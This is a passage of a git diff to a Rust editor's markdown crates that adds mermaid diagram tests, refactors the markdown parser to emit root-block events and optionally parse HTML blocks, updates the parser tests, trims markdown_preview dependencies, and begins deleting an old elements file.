test_parse_mermaid_info() { + assert_eq!(parse_mermaid_info("mermaid"), Some(100)); + assert_eq!(parse_mermaid_info("mermaid 150"), Some(150)); + assert_eq!(parse_mermaid_info("mermaid 5"), Some(10)); + assert_eq!(parse_mermaid_info("mermaid 999"), Some(500)); + assert_eq!(parse_mermaid_info("rust"), None); + } + + #[test] + fn test_extract_mermaid_diagrams_parses_scale() { + let markdown = "```mermaid 150\ngraph TD;\n```\n\n```rust\nfn main() {}\n```"; + let events = crate::parser::parse_markdown_with_options(markdown, false).events; + let diagrams = extract_mermaid_diagrams(markdown, &events); + + assert_eq!(diagrams.len(), 1); + let diagram = diagrams.values().next().unwrap(); + assert_eq!(diagram.contents.contents, "graph TD;"); + assert_eq!(diagram.contents.scale, 150); + } + + #[gpui::test] + fn test_mermaid_fallback_on_edit(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph B", "graph C"]); + let new_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); + + let svg_b = mock_render_image(cx); + + let mut cache: MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + cache.insert( + mermaid_contents("graph B"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(svg_b.clone()), + None, + )), + ); + cache.insert( + mermaid_contents("graph C"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = + mermaid_fallback("graph B modified", &new_full_order, &old_full_order, &cache); + + assert_eq!(fallback.as_ref().map(|image| image.id), Some(svg_b.id)); + } + + #[gpui::test] + fn test_mermaid_no_fallback_on_add_in_middle(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph C"]); + let new_full_order = mermaid_sequence(&["graph A", "graph NEW", "graph C"]); + + let mut cache: 
MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + cache.insert( + mermaid_contents("graph C"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = mermaid_fallback("graph NEW", &new_full_order, &old_full_order, &cache); + + assert!(fallback.is_none()); + } + + #[gpui::test] + fn test_mermaid_fallback_chains_on_rapid_edits(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); + let new_full_order = mermaid_sequence(&["graph A", "graph B modified again", "graph C"]); + + let original_svg = mock_render_image(cx); + + let mut cache: MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + cache.insert( + mermaid_contents("graph B modified"), + Arc::new(CachedMermaidDiagram::new_for_test( + None, + Some(original_svg.clone()), + )), + ); + cache.insert( + mermaid_contents("graph C"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = mermaid_fallback( + "graph B modified again", + &new_full_order, + &old_full_order, + &cache, + ); + + assert_eq!( + fallback.as_ref().map(|image| image.id), + Some(original_svg.id) + ); + } + + #[gpui::test] + fn test_mermaid_fallback_with_duplicate_blocks_edit_second(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph A", "graph B"]); + let new_full_order = mermaid_sequence(&["graph A", "graph A edited", "graph B"]); + + let svg_a = mock_render_image(cx); + + let mut cache: MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(svg_a.clone()), + None, + )), + ); + 
cache.insert( + mermaid_contents("graph B"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = mermaid_fallback("graph A edited", &new_full_order, &old_full_order, &cache); + + assert_eq!(fallback.as_ref().map(|image| image.id), Some(svg_a.id)); + } + + #[gpui::test] + fn test_mermaid_rendering_replaces_code_block_text(cx: &mut TestAppContext) { + let rendered = render_markdown_with_options( + "```mermaid\ngraph TD;\n```", + MarkdownOptions { + render_mermaid_diagrams: true, + ..Default::default() + }, + cx, + ); + + let text = rendered + .lines + .iter() + .map(|line| line.layout.wrapped_text()) + .collect::>() + .join("\n"); + + assert!(!text.contains("graph TD;")); + } + + #[gpui::test] + fn test_mermaid_source_anchor_maps_inside_block(cx: &mut TestAppContext) { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| { + Markdown::new_with_options( + "```mermaid\ngraph TD;\n```".into(), + None, + None, + MarkdownOptions { + render_mermaid_diagrams: true, + ..Default::default() + }, + cx, + ) + }); + cx.run_until_parked(); + let render_image = mock_render_image(cx); + markdown.update(cx, |markdown, _| { + let contents = markdown + .parsed_markdown + .mermaid_diagrams + .values() + .next() + .unwrap() + .contents + .clone(); + markdown.mermaid_state.cache.insert( + contents.clone(), + Arc::new(CachedMermaidDiagram::new_for_test(Some(render_image), None)), + ); + markdown.mermaid_state.order = vec![contents]; + }); + + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown.clone(), MarkdownStyle::default()) + .code_block_renderer(CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + 
border: false, + }) + }, + ); + + let mermaid_diagram = markdown.update(cx, |markdown, _| { + markdown + .parsed_markdown + .mermaid_diagrams + .values() + .next() + .unwrap() + .clone() + }); + assert!( + rendered + .text + .position_for_source_index(mermaid_diagram.content_range.start) + .is_some() + ); + assert!( + rendered + .text + .position_for_source_index(mermaid_diagram.content_range.end.saturating_sub(1)) + .is_some() + ); + } +} diff --git a/crates/markdown/src/parser.rs b/crates/markdown/src/parser.rs index 21738147eed1b5b02da1c85207736160bd37ceb3..6de5b16a71053f9a61a3e9c2d66d91cd962540a0 100644 --- a/crates/markdown/src/parser.rs +++ b/crates/markdown/src/parser.rs @@ -4,13 +4,13 @@ pub use pulldown_cmark::TagEnd as MarkdownTagEnd; use pulldown_cmark::{ Alignment, CowStr, HeadingLevel, LinkType, MetadataBlockKind, Options, Parser, }; -use std::{ops::Range, sync::Arc}; +use std::{collections::BTreeMap, ops::Range, sync::Arc}; use collections::HashSet; -use crate::path_range::PathWithRange; +use crate::{html, path_range::PathWithRange}; -const PARSE_OPTIONS: Options = Options::ENABLE_TABLES +pub const PARSE_OPTIONS: Options = Options::ENABLE_TABLES .union(Options::ENABLE_FOOTNOTES) .union(Options::ENABLE_STRIKETHROUGH) .union(Options::ENABLE_TASKLISTS) @@ -22,17 +22,71 @@ const PARSE_OPTIONS: Options = Options::ENABLE_TABLES .union(Options::ENABLE_SUPERSCRIPT) .union(Options::ENABLE_SUBSCRIPT); -pub fn parse_markdown( - text: &str, -) -> ( - Vec<(Range, MarkdownEvent)>, - HashSet, - HashSet>, -) { - let mut events = Vec::new(); +#[derive(Default)] +struct ParseState { + events: Vec<(Range, MarkdownEvent)>, + root_block_starts: Vec, + depth: usize, +} + +#[derive(Debug, Default)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedMarkdownData { + pub events: Vec<(Range, MarkdownEvent)>, + pub language_names: HashSet, + pub language_paths: HashSet>, + pub root_block_starts: Vec, + pub html_blocks: BTreeMap, +} + +impl ParseState { + fn 
push_event(&mut self, range: Range, event: MarkdownEvent) { + match &event { + MarkdownEvent::Start(_) => { + if self.depth == 0 { + self.root_block_starts.push(range.start); + self.events.push((range.clone(), MarkdownEvent::RootStart)); + } + self.depth += 1; + self.events.push((range, event)); + } + MarkdownEvent::End(_) => { + self.events.push((range.clone(), event)); + if self.depth > 0 { + self.depth -= 1; + if self.depth == 0 { + let root_block_index = self.root_block_starts.len() - 1; + self.events + .push((range, MarkdownEvent::RootEnd(root_block_index))); + } + } + } + MarkdownEvent::Rule => { + if self.depth == 0 && !range.is_empty() { + self.root_block_starts.push(range.start); + let root_block_index = self.root_block_starts.len() - 1; + self.events.push((range.clone(), MarkdownEvent::RootStart)); + self.events.push((range.clone(), event)); + self.events + .push((range, MarkdownEvent::RootEnd(root_block_index))); + } else { + self.events.push((range, event)); + } + } + _ => { + self.events.push((range, event)); + } + } + } +} + +pub(crate) fn parse_markdown_with_options(text: &str, parse_html: bool) -> ParsedMarkdownData { + let mut state = ParseState::default(); let mut language_names = HashSet::default(); let mut language_paths = HashSet::default(); + let mut html_blocks = BTreeMap::default(); let mut within_link = false; + let mut within_code_block = false; let mut within_metadata = false; let mut parser = Parser::new_ext(text, PARSE_OPTIONS) .into_offset_iter() @@ -48,6 +102,32 @@ pub fn parse_markdown( } match pulldown_event { pulldown_cmark::Event::Start(tag) => { + if let pulldown_cmark::Tag::HtmlBlock = &tag { + state.push_event(range.clone(), MarkdownEvent::Start(MarkdownTag::HtmlBlock)); + + if parse_html { + if let Some(block) = + html::html_parser::parse_html_block(&text[range.clone()], range.clone()) + { + html_blocks.insert(range.start, block); + + while let Some((event, end_range)) = parser.next() { + if let pulldown_cmark::Event::End( + 
pulldown_cmark::TagEnd::HtmlBlock, + ) = event + { + state.push_event( + end_range, + MarkdownEvent::End(MarkdownTagEnd::HtmlBlock), + ); + break; + } + } + } + } + continue; + } + let tag = match tag { pulldown_cmark::Tag::Link { link_type, @@ -63,11 +143,12 @@ pub fn parse_markdown( id: SharedString::from(id.into_string()), } } - pulldown_cmark::Tag::MetadataBlock(kind) => { + pulldown_cmark::Tag::MetadataBlock(_kind) => { within_metadata = true; - MarkdownTag::MetadataBlock(kind) + continue; } pulldown_cmark::Tag::CodeBlock(pulldown_cmark::CodeBlockKind::Indented) => { + within_code_block = true; MarkdownTag::CodeBlock { kind: CodeBlockKind::Indented, metadata: CodeBlockMetadata { @@ -79,6 +160,7 @@ pub fn parse_markdown( pulldown_cmark::Tag::CodeBlock(pulldown_cmark::CodeBlockKind::Fenced( ref info, )) => { + within_code_block = true; let content_range = extract_code_block_content_range(&text[range.clone()]); let content_range = content_range.start + range.start..content_range.end + range.start; @@ -164,20 +246,22 @@ pub fn parse_markdown( title: SharedString::from(title.into_string()), id: SharedString::from(id.into_string()), }, - pulldown_cmark::Tag::HtmlBlock => MarkdownTag::HtmlBlock, + pulldown_cmark::Tag::HtmlBlock => MarkdownTag::HtmlBlock, // this is handled above separately pulldown_cmark::Tag::DefinitionList => MarkdownTag::DefinitionList, pulldown_cmark::Tag::DefinitionListTitle => MarkdownTag::DefinitionListTitle, pulldown_cmark::Tag::DefinitionListDefinition => { MarkdownTag::DefinitionListDefinition } }; - events.push((range, MarkdownEvent::Start(tag))) + state.push_event(range, MarkdownEvent::Start(tag)) } pulldown_cmark::Event::End(tag) => { if let pulldown_cmark::TagEnd::Link = tag { within_link = false; + } else if let pulldown_cmark::TagEnd::CodeBlock = tag { + within_code_block = false; } - events.push((range, MarkdownEvent::End(tag))); + state.push_event(range, MarkdownEvent::End(tag)); } pulldown_cmark::Event::Text(parsed) => { fn 
event_for( @@ -191,6 +275,13 @@ pub fn parse_markdown( (range, MarkdownEvent::SubstitutedText(str.to_owned())) } } + + if within_code_block { + let (range, event) = event_for(text, range, &parsed); + state.push_event(range, event); + continue; + } + #[derive(Debug)] struct TextRange<'a> { source_range: Range, @@ -205,16 +296,26 @@ pub fn parse_markdown( parsed, }]; - while matches!(parser.peek(), Some((pulldown_cmark::Event::Text(_), _))) { - let Some((pulldown_cmark::Event::Text(next_event), next_range)) = parser.next() - else { + while matches!(parser.peek(), Some((pulldown_cmark::Event::Text(_), _))) + || (parse_html + && matches!( + parser.peek(), + Some((pulldown_cmark::Event::InlineHtml(_), _)) + )) + { + let Some((next_event, next_range)) = parser.next() else { unreachable!() }; - let next_len = last_len + next_event.len(); + let next_text = match next_event { + pulldown_cmark::Event::Text(next_event) => next_event, + pulldown_cmark::Event::InlineHtml(_) => CowStr::Borrowed(""), + _ => unreachable!(), + }; + let next_len = last_len + next_text.len(); ranges.push(TextRange { source_range: next_range.clone(), merged_range: last_len..next_len, - parsed: next_event, + parsed: next_text, }); last_len = next_len; } @@ -227,7 +328,7 @@ pub fn parse_markdown( let mut ranges = ranges.into_iter().peekable(); - if !within_link { + if !within_link && !within_code_block { let mut finder = LinkFinder::new(); finder.kinds(&[linkify::LinkKind::Url]); @@ -241,7 +342,8 @@ pub fn parse_markdown( .is_some_and(|range| range.merged_range.end <= link_start_in_merged) { let range = ranges.next().unwrap(); - events.push(event_for(text, range.source_range, &range.parsed)); + let (range, event) = event_for(text, range.source_range, &range.parsed); + state.push_event(range, event); } let Some(range) = ranges.peek_mut() else { @@ -250,11 +352,12 @@ pub fn parse_markdown( let prefix_len = link_start_in_merged - range.merged_range.start; if prefix_len > 0 { let (head, tail) = 
range.parsed.split_at(prefix_len); - events.push(event_for( + let (event_range, event) = event_for( text, range.source_range.start..range.source_range.start + prefix_len, head, - )); + ); + state.push_event(event_range, event); range.parsed = CowStr::Boxed(tail.into()); range.merged_range.start += prefix_len; range.source_range.start += prefix_len; @@ -290,7 +393,7 @@ pub fn parse_markdown( } let link_range = link_start_in_source..link_end_in_source; - events.push(( + state.push_event( link_range.clone(), MarkdownEvent::Start(MarkdownTag::Link { link_type: LinkType::Autolink, @@ -298,37 +401,52 @@ pub fn parse_markdown( title: SharedString::default(), id: SharedString::default(), }), - )); - events.extend(link_events); - events.push((link_range.clone(), MarkdownEvent::End(MarkdownTagEnd::Link))); + ); + for (range, event) in link_events { + state.push_event(range, event); + } + state.push_event( + link_range.clone(), + MarkdownEvent::End(MarkdownTagEnd::Link), + ); } } for range in ranges { - events.push(event_for(text, range.source_range, &range.parsed)); + let (range, event) = event_for(text, range.source_range, &range.parsed); + state.push_event(range, event); } } pulldown_cmark::Event::Code(_) => { let content_range = extract_code_content_range(&text[range.clone()]); let content_range = content_range.start + range.start..content_range.end + range.start; - events.push((content_range, MarkdownEvent::Code)) + state.push_event(content_range, MarkdownEvent::Code) + } + pulldown_cmark::Event::Html(_) => state.push_event(range, MarkdownEvent::Html), + pulldown_cmark::Event::InlineHtml(_) => { + state.push_event(range, MarkdownEvent::InlineHtml) } - pulldown_cmark::Event::Html(_) => events.push((range, MarkdownEvent::Html)), - pulldown_cmark::Event::InlineHtml(_) => events.push((range, MarkdownEvent::InlineHtml)), pulldown_cmark::Event::FootnoteReference(_) => { - events.push((range, MarkdownEvent::FootnoteReference)) + state.push_event(range, 
MarkdownEvent::FootnoteReference) } - pulldown_cmark::Event::SoftBreak => events.push((range, MarkdownEvent::SoftBreak)), - pulldown_cmark::Event::HardBreak => events.push((range, MarkdownEvent::HardBreak)), - pulldown_cmark::Event::Rule => events.push((range, MarkdownEvent::Rule)), + pulldown_cmark::Event::SoftBreak => state.push_event(range, MarkdownEvent::SoftBreak), + pulldown_cmark::Event::HardBreak => state.push_event(range, MarkdownEvent::HardBreak), + pulldown_cmark::Event::Rule => state.push_event(range, MarkdownEvent::Rule), pulldown_cmark::Event::TaskListMarker(checked) => { - events.push((range, MarkdownEvent::TaskListMarker(checked))) + state.push_event(range, MarkdownEvent::TaskListMarker(checked)) } pulldown_cmark::Event::InlineMath(_) | pulldown_cmark::Event::DisplayMath(_) => {} } } - (events, language_names, language_paths) + + ParsedMarkdownData { + events: state.events, + language_names, + language_paths, + root_block_starts: state.root_block_starts, + html_blocks, + } } pub fn parse_links_only(text: &str) -> Vec<(Range, MarkdownEvent)> { @@ -401,6 +519,10 @@ pub enum MarkdownEvent { Rule, /// A task list marker, rendered as a checkbox in HTML. Contains a true when it is checked. TaskListMarker(bool), + /// Start of a root-level block (a top-level structural element like a paragraph, heading, list, etc.). + RootStart, + /// End of a root-level block. Contains the root block index. + RootEnd(usize), } /// Tags for elements that can contain other elements. 
@@ -575,31 +697,39 @@ mod tests { #[test] fn test_html_comments() { assert_eq!( - parse_markdown(" \nReturns"), - ( - vec![ + parse_markdown_with_options(" \nReturns", false), + ParsedMarkdownData { + events: vec![ + (2..30, RootStart), (2..30, Start(HtmlBlock)), (2..2, SubstitutedText(" ".into())), (2..7, Html), (7..26, Html), (26..30, Html), (2..30, End(MarkdownTagEnd::HtmlBlock)), + (2..30, RootEnd(0)), + (30..37, RootStart), (30..37, Start(Paragraph)), (30..37, Text), - (30..37, End(MarkdownTagEnd::Paragraph)) + (30..37, End(MarkdownTagEnd::Paragraph)), + (30..37, RootEnd(1)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![2, 30], + ..Default::default() + } ) } #[test] fn test_plain_urls_and_escaped_text() { assert_eq!( - parse_markdown("   https://some.url some \\`►\\` text"), - ( - vec![ + parse_markdown_with_options( + "   https://some.url some \\`►\\` text", + false + ), + ParsedMarkdownData { + events: vec![ + (0..51, RootStart), (0..51, Start(Paragraph)), (0..6, SubstitutedText("\u{a0}".into())), (6..12, SubstitutedText("\u{a0}".into())), @@ -620,19 +750,25 @@ mod tests { (37..44, SubstitutedText("►".into())), (45..46, Text), // Escaped backtick (46..51, Text), - (0..51, End(MarkdownTagEnd::Paragraph)) + (0..51, End(MarkdownTagEnd::Paragraph)), + (0..51, RootEnd(0)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![0], + ..Default::default() + } ); } #[test] fn test_incomplete_link() { assert_eq!( - parse_markdown("You can use the [GitHub Search API](https://docs.github.com/en").0, + parse_markdown_with_options( + "You can use the [GitHub Search API](https://docs.github.com/en", + false + ) + .events, vec![ + (0..62, RootStart), (0..62, Start(Paragraph)), (0..16, Text), (16..17, Text), @@ -650,7 +786,8 @@ mod tests { ), (36..62, Text), (36..62, End(MarkdownTagEnd::Link)), - (0..62, End(MarkdownTagEnd::Paragraph)) + (0..62, End(MarkdownTagEnd::Paragraph)), + (0..62, RootEnd(0)), ], ); } @@ -658,9 
+795,13 @@ mod tests { #[test] fn test_smart_punctuation() { assert_eq!( - parse_markdown("-- --- ... \"double quoted\" 'single quoted' ----------"), - ( - vec![ + parse_markdown_with_options( + "-- --- ... \"double quoted\" 'single quoted' ----------", + false + ), + ParsedMarkdownData { + events: vec![ + (0..53, RootStart), (0..53, Start(Paragraph)), (0..2, SubstitutedText("–".into())), (2..3, Text), @@ -668,29 +809,31 @@ mod tests { (6..7, Text), (7..10, SubstitutedText("…".into())), (10..11, Text), - (11..12, SubstitutedText("“".into())), + (11..12, SubstitutedText("\u{201c}".into())), (12..25, Text), - (25..26, SubstitutedText("”".into())), + (25..26, SubstitutedText("\u{201d}".into())), (26..27, Text), - (27..28, SubstitutedText("‘".into())), + (27..28, SubstitutedText("\u{2018}".into())), (28..41, Text), - (41..42, SubstitutedText("’".into())), + (41..42, SubstitutedText("\u{2019}".into())), (42..43, Text), (43..53, SubstitutedText("–––––".into())), - (0..53, End(MarkdownTagEnd::Paragraph)) + (0..53, End(MarkdownTagEnd::Paragraph)), + (0..53, RootEnd(0)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![0], + ..Default::default() + } ) } #[test] fn test_code_block_metadata() { assert_eq!( - parse_markdown("```rust\nfn main() {\n let a = 1;\n}\n```"), - ( - vec![ + parse_markdown_with_options("```rust\nfn main() {\n let a = 1;\n}\n```", false), + ParsedMarkdownData { + events: vec![ + (0..37, RootStart), ( 0..37, Start(CodeBlock { @@ -703,19 +846,22 @@ mod tests { ), (8..34, Text), (0..37, End(MarkdownTagEnd::CodeBlock)), + (0..37, RootEnd(0)), ], - { + language_names: { let mut h = HashSet::default(); h.insert("rust".into()); h }, - HashSet::default() - ) + root_block_starts: vec![0], + ..Default::default() + } ); assert_eq!( - parse_markdown(" fn main() {}"), - ( - vec![ + parse_markdown_with_options(" fn main() {}", false), + ParsedMarkdownData { + events: vec![ + (4..16, RootStart), ( 4..16, Start(CodeBlock { @@ -727,12 +873,126 
@@ mod tests { }) ), (4..16, Text), - (4..16, End(MarkdownTagEnd::CodeBlock)) + (4..16, End(MarkdownTagEnd::CodeBlock)), + (4..16, RootEnd(0)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![4], + ..Default::default() + } + ); + } + + fn assert_code_block_does_not_emit_links(markdown: &str) { + let parsed = parse_markdown_with_options(markdown, false); + let mut code_block_depth = 0; + let mut code_block_count = 0; + let mut saw_text_inside_code_block = false; + + for (_, event) in &parsed.events { + match event { + Start(CodeBlock { .. }) => { + code_block_depth += 1; + code_block_count += 1; + } + End(MarkdownTagEnd::CodeBlock) => { + assert!( + code_block_depth > 0, + "encountered a code block end without a matching start" + ); + code_block_depth -= 1; + } + Start(Link { .. }) | End(MarkdownTagEnd::Link) => { + assert_eq!( + code_block_depth, 0, + "code blocks should not emit link events" + ); + } + Text | SubstitutedText(_) if code_block_depth > 0 => { + saw_text_inside_code_block = true; + } + _ => {} + } + } + + assert_eq!(code_block_count, 1, "expected exactly one code block"); + assert_eq!(code_block_depth, 0, "unterminated code block"); + assert!( + saw_text_inside_code_block, + "expected text inside the code block" + ); + } + + #[test] + fn test_code_blocks_do_not_autolink_urls() { + assert_code_block_does_not_emit_links("```txt\nhttps://example.com\n```"); + assert_code_block_does_not_emit_links(" https://example.com"); + assert_code_block_does_not_emit_links( + "```txt\r\nhttps:/\\/example.com\r\nhttps://example.com\r\n```", ); + assert_code_block_does_not_emit_links( + " https:/\\/example.com\r\n https://example.com", + ); + } + + #[test] + fn test_metadata_blocks_do_not_affect_root_blocks() { + assert_eq!( + parse_markdown_with_options("+++\ntitle = \"Example\"\n+++\n\nParagraph", false), + ParsedMarkdownData { + events: vec![ + (27..36, RootStart), + (27..36, Start(Paragraph)), + (27..36, Text), + (27..36, 
End(MarkdownTagEnd::Paragraph)), + (27..36, RootEnd(0)), + ], + root_block_starts: vec![27], + ..Default::default() + } + ); + } + + #[test] + fn test_table_checkboxes_remain_text_in_cells() { + let markdown = "\ +| Done | Task | +|------|---------| +| [x] | Fix bug | +| [ ] | Add feature |"; + let parsed = parse_markdown_with_options(markdown, false); + + let mut in_table = false; + let mut saw_task_list_marker = false; + let mut cell_texts = Vec::new(); + let mut current_cell = String::new(); + + for (range, event) in &parsed.events { + match event { + Start(Table(_)) => in_table = true, + End(MarkdownTagEnd::Table) => in_table = false, + Start(TableCell) => current_cell.clear(), + End(MarkdownTagEnd::TableCell) => { + if in_table { + cell_texts.push(current_cell.clone()); + } + } + Text if in_table => current_cell.push_str(&markdown[range.clone()]), + TaskListMarker(_) if in_table => saw_task_list_marker = true, + _ => {} + } + } + + let checkbox_cells: Vec<&str> = cell_texts + .iter() + .map(|cell| cell.trim()) + .filter(|cell| *cell == "[x]" || *cell == "[X]" || *cell == "[ ]") + .collect(); + + assert!( + !saw_task_list_marker, + "Table checkboxes should remain text, not task-list markers" + ); + assert_eq!(checkbox_cells, vec!["[x]", "[ ]"]); } #[test] @@ -776,8 +1036,13 @@ mod tests { // Note: In real usage, pulldown_cmark creates separate text events for the escaped character // We're verifying our parser can handle this correctly assert_eq!( - parse_markdown("https:/\\/example.com is equivalent to https://example.com!").0, + parse_markdown_with_options( + "https:/\\/example.com is equivalent to https://example.com!", + false + ) + .events, vec![ + (0..62, RootStart), (0..62, Start(Paragraph)), ( 0..20, @@ -806,13 +1071,19 @@ mod tests { (58..61, Text), (38..61, End(MarkdownTagEnd::Link)), (61..62, Text), - (0..62, End(MarkdownTagEnd::Paragraph)) + (0..62, End(MarkdownTagEnd::Paragraph)), + (0..62, RootEnd(0)), ], ); assert_eq!( - parse_markdown("Visit 
https://example.com/cat\\/é‍☕ for coffee!").0, + parse_markdown_with_options( + "Visit https://example.com/cat\\/é‍☕ for coffee!", + false + ) + .events, [ + (0..55, RootStart), (0..55, Start(Paragraph)), (0..6, Text), ( @@ -830,7 +1101,8 @@ mod tests { (40..43, Text), (6..43, End(MarkdownTagEnd::Link)), (43..55, Text), - (0..55, End(MarkdownTagEnd::Paragraph)) + (0..55, End(MarkdownTagEnd::Paragraph)), + (0..55, RootEnd(0)), ] ); } diff --git a/crates/markdown_preview/Cargo.toml b/crates/markdown_preview/Cargo.toml index 1cfc1b4e59ef14b47ab5845dc67e2ad77c9232e5..3a07b258c5bd17ef2da02820ef2e724f7389ce13 100644 --- a/crates/markdown_preview/Cargo.toml +++ b/crates/markdown_preview/Cargo.toml @@ -16,28 +16,19 @@ test-support = [] [dependencies] anyhow.workspace = true -async-recursion.workspace = true -collections.workspace = true -crashes.workspace = true editor.workspace = true -fs.workspace = true gpui.workspace = true -html5ever.workspace = true language.workspace = true -linkify.workspace = true log.workspace = true -markup5ever_rcdom.workspace = true -pretty_assertions.workspace = true -pulldown-cmark.workspace = true +markdown.workspace = true +project.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true urlencoding.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace = true -mermaid-rs-renderer.workspace = true [dev-dependencies] -editor = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } +tempfile.workspace = true diff --git a/crates/markdown_preview/src/markdown_elements.rs b/crates/markdown_preview/src/markdown_elements.rs deleted file mode 100644 index 1887da31621901fe7582192770018bd4e53a3c64..0000000000000000000000000000000000000000 --- a/crates/markdown_preview/src/markdown_elements.rs +++ /dev/null @@ -1,373 +0,0 @@ -use gpui::{ - DefiniteLength, FontStyle, FontWeight, HighlightStyle, 
SharedString, StrikethroughStyle, - UnderlineStyle, px, -}; -use language::HighlightId; -use std::{fmt::Display, ops::Range, path::PathBuf}; -use urlencoding; - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub enum ParsedMarkdownElement { - Heading(ParsedMarkdownHeading), - ListItem(ParsedMarkdownListItem), - Table(ParsedMarkdownTable), - BlockQuote(ParsedMarkdownBlockQuote), - CodeBlock(ParsedMarkdownCodeBlock), - MermaidDiagram(ParsedMarkdownMermaidDiagram), - /// A paragraph of text and other inline elements. - Paragraph(MarkdownParagraph), - HorizontalRule(Range), - Image(Image), -} - -impl ParsedMarkdownElement { - pub fn source_range(&self) -> Option> { - Some(match self { - Self::Heading(heading) => heading.source_range.clone(), - Self::ListItem(list_item) => list_item.source_range.clone(), - Self::Table(table) => table.source_range.clone(), - Self::BlockQuote(block_quote) => block_quote.source_range.clone(), - Self::CodeBlock(code_block) => code_block.source_range.clone(), - Self::MermaidDiagram(mermaid) => mermaid.source_range.clone(), - Self::Paragraph(text) => match text.get(0)? { - MarkdownParagraphChunk::Text(t) => t.source_range.clone(), - MarkdownParagraphChunk::Image(image) => image.source_range.clone(), - }, - Self::HorizontalRule(range) => range.clone(), - Self::Image(image) => image.source_range.clone(), - }) - } - - pub fn is_list_item(&self) -> bool { - matches!(self, Self::ListItem(_)) - } -} - -pub type MarkdownParagraph = Vec; - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub enum MarkdownParagraphChunk { - Text(ParsedMarkdownText), - Image(Image), -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdown { - pub children: Vec, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownListItem { - pub source_range: Range, - /// How many indentations deep this item is. 
- pub depth: u16, - pub item_type: ParsedMarkdownListItemType, - pub content: Vec, - /// Whether we can expect nested list items inside of this items `content`. - pub nested: bool, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub enum ParsedMarkdownListItemType { - Ordered(u64), - Task(bool, Range), - Unordered, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownCodeBlock { - pub source_range: Range, - pub language: Option, - pub contents: SharedString, - pub highlights: Option, HighlightId)>>, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownMermaidDiagram { - pub source_range: Range, - pub contents: ParsedMarkdownMermaidDiagramContents, -} - -#[derive(Clone, Debug, PartialEq, Eq, Hash)] -pub struct ParsedMarkdownMermaidDiagramContents { - pub contents: SharedString, - pub scale: u32, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownHeading { - pub source_range: Range, - pub level: HeadingLevel, - pub contents: MarkdownParagraph, -} - -#[derive(Debug, PartialEq)] -pub enum HeadingLevel { - H1, - H2, - H3, - H4, - H5, - H6, -} - -#[derive(Debug)] -pub struct ParsedMarkdownTable { - pub source_range: Range, - pub header: Vec, - pub body: Vec, - pub caption: Option, -} - -#[derive(Debug, Clone, Copy, Default)] -#[cfg_attr(test, derive(PartialEq))] -pub enum ParsedMarkdownTableAlignment { - #[default] - None, - Left, - Center, - Right, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownTableColumn { - pub col_span: usize, - pub row_span: usize, - pub is_header: bool, - pub children: MarkdownParagraph, - pub alignment: ParsedMarkdownTableAlignment, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownTableRow { - pub columns: Vec, -} - -impl Default for ParsedMarkdownTableRow { - fn default() -> Self { - Self::new() - } -} - -impl ParsedMarkdownTableRow { - pub fn new() -> 
